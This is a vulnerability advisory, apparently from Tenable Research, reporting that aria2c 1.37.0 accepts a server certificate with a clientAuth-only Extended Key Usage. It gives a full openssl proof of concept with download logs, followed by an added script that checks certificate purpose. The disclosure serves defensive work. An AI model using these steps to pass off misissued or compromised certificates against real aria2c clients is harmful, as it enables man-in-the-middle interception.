aria2c Improper Certificate Validation


Tenable Research discovered that aria2c accepts a server certificate with an incorrect Extended Key Usage (EKU). If attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication.

 

Proof of Concept

In this PoC, we generate private keys and the corresponding X.509 certificates, configure a TLS server to use them, and then show that aria2c fails to properly validate a certificate not meant to be used for TLS server authentication. In a real attack, the attackers would reuse an X.509 certificate and corresponding key that they had managed to compromise.

 

Generate a set of RSA keys:

openssl genrsa -out ca-key.pem 2048

openssl genrsa -out server-key.pem 2048

 

Create an OpenSSL config:

cat openssl-ca.cfg 

[ ca ]

keyUsage                = critical,digitalSignature,keyCertSign,cRLSign

extendedKeyUsage        = serverAuth,clientAuth

basicConstraints        = critical,CA:TRUE

subjectKeyIdentifier    = hash

authorityKeyIdentifier  = keyid:always

 

[ server ]

keyUsage                = critical,digitalSignature

extendedKeyUsage        = serverAuth

basicConstraints        = critical,CA:FALSE

subjectKeyIdentifier    = hash

authorityKeyIdentifier  = keyid:always

 

[ server-bad-eku ]

keyUsage                = critical,digitalSignature

extendedKeyUsage        = clientAuth

basicConstraints        = critical,CA:FALSE

subjectKeyIdentifier    = hash

authorityKeyIdentifier  = keyid:always

 

Generate root CA certificate:

openssl req -x509 -new -key ca-key.pem -days 365 -out ca-cert.pem -subj "/CN=TestCA" -config openssl-ca.cfg -extensions ca

 

Generate a certificate signing request:

openssl req -new -key server-key.pem -out server.csr -subj "/CN=server" -addext "subjectAltName = DNS:localhost"

 

Generate a valid server certificate:

openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server -copy_extensions copyall

 

Check EKU in the generated certificate:

openssl x509 -text -noout -in server-cert.pem | grep -i 'Extended Key Usage' -A1

            X509v3 Extended Key Usage: 

                TLS Web Server Authentication

 

Generate an invalid server certificate with an incorrect EKU:

openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-bad-eku-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server-bad-eku -copy_extensions copyall

 

Check EKU in the generated certificate:

openssl x509 -text -noout -in server-bad-eku-cert.pem | grep -i 'Extended Key Usage' -A1

            X509v3 Extended Key Usage: 

                TLS Web Client Authentication

 

Start a server using a valid server certificate:

openssl s_server -key server-key.pem -cert server-cert.pem -www -port 8080

 

Connection succeeds as expected:

aria2c --ca-certificate=ca-cert.pem https://localhost:8080

 

04/30 18:14:37 [NOTICE] Downloading 1 item(s)

 

04/30 18:14:37 [NOTICE] Download complete: /home/parallels/aria2c/index.html

 

Download Results:

gid   |stat|avg speed  |path/URI

======+====+===========+=======================================================

9bf002|OK  |   588KiB/s|/home/parallels/aria2c/index.html

 

Status Legend:

(OK):download completed.

 

Start a server using a server certificate with incorrect EKU:

openssl s_server -key server-key.pem -cert server-bad-eku-cert.pem -www -port 8080

 

Connection succeeds while it shouldn’t:

aria2c --ca-certificate=ca-cert.pem https://localhost:8080

 

04/30 18:14:57 [NOTICE] Downloading 1 item(s)

 

04/30 18:14:57 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.1.html.

 

04/30 18:14:57 [NOTICE] Download complete: /home/parallels/aria2c/index.1.html

 

Download Results:

gid   |stat|avg speed  |path/URI

======+====+===========+=======================================================

c6e101|OK  |   673KiB/s|/home/parallels/aria2c/index.1.html

 

Status Legend:

(OK):download completed.

 

 

aria2c --ca-certificate=ca-cert.pem --check-certificate https://localhost:8080

 

04/30 18:15:07 [NOTICE] Downloading 1 item(s)

 

04/30 18:15:07 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.2.html.

 

04/30 18:15:07 [NOTICE] Download complete: /home/parallels/aria2c/index.2.html

 

Download Results:

gid   |stat|avg speed  |path/URI

======+====+===========+=======================================================

686fe6|OK  |   786KiB/s|/home/parallels/aria2c/index.2.html

 

Status Legend:

(OK):download completed.

 

aria2c --ca-certificate=ca-cert.pem --check-certificate=true https://localhost:8080

 

04/30 18:15:14 [NOTICE] Downloading 1 item(s)

 

04/30 18:15:14 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.3.html.

 

04/30 18:15:14 [NOTICE] Download complete: /home/parallels/aria2c/index.3.html

 

Download Results:

gid   |stat|avg speed  |path/URI

======+====+===========+=======================================================

4a4aec|OK  |   786KiB/s|/home/parallels/aria2c/index.3.html

 

Status Legend:

(OK):download completed.

 

Version of aria2c which was tested on Ubuntu 24.04:

aria2c --version | head -n 1

aria2 version 1.37.0

 

Other versions may be vulnerable too, but we have not validated additional versions.
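
The purpose check that this PoC finds missing can be reproduced with OpenSSL's own verifier. The following is an added example, not part of the original advisory: it builds a throwaway CA and two leaf certificates like the ones above (the pki.cfg file, the function names and PKI_DIR are assumptions of this example) and shows that openssl verify -purpose sslserver rejects the clientAuth-only certificate even though its chain and signature are valid.

```shell
# Added example: constructed throwaway PKI mirroring the PoC (SAN is set at signing time here).
make_test_pki() {  # arg: directory in which to create the keys and certificates
  cat > "$1/pki.cfg" <<'EOF'
[ req ]
distinguished_name = dn
[ dn ]
[ ca ]
keyUsage         = critical,digitalSignature,keyCertSign,cRLSign
extendedKeyUsage = serverAuth,clientAuth
basicConstraints = critical,CA:TRUE
[ server ]
keyUsage         = critical,digitalSignature
extendedKeyUsage = serverAuth
basicConstraints = critical,CA:FALSE
subjectAltName   = DNS:localhost
[ server-bad-eku ]
keyUsage         = critical,digitalSignature
extendedKeyUsage = clientAuth
basicConstraints = critical,CA:FALSE
subjectAltName   = DNS:localhost
EOF
  ( cd "$1" || exit 1
    openssl genrsa -out ca-key.pem 2048 && openssl genrsa -out server-key.pem 2048 &&
    openssl req -x509 -new -key ca-key.pem -days 1 -out ca-cert.pem \
      -subj "/CN=TestCA" -config pki.cfg -extensions ca &&
    openssl req -new -key server-key.pem -out server.csr -subj "/CN=server" -config pki.cfg || exit 1
    # Same key and CSR, signed twice: once with EKU serverAuth, once with EKU clientAuth.
    for ext in server server-bad-eku; do
      openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr \
        -out "$ext-cert.pem" -days 1 -extfile pki.cfg -extensions "$ext" || exit 1
    done
  ) >/dev/null 2>&1
}

# True only if the chain verifies AND the leaf is acceptable as a TLS server certificate.
check_server_purpose() {  # args: CA file, leaf certificate
  openssl verify -purpose sslserver -CAfile "$1" "$2" >/dev/null 2>&1
}
# Chain and signature check with no purpose restriction, for comparison.
check_chain_only() {  # args: CA file, leaf certificate
  openssl verify -purpose any -CAfile "$1" "$2" >/dev/null 2>&1
}

PKI_DIR=$(mktemp -d)
make_test_pki "$PKI_DIR" || echo "could not build the test PKI with openssl" >&2
for c in server-cert.pem server-bad-eku-cert.pem; do
  check_server_purpose "$PKI_DIR/ca-cert.pem" "$PKI_DIR/$c" && r=accepted || r=REJECTED
  echo "$c: $r for TLS server authentication"
done
```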

Ben Smith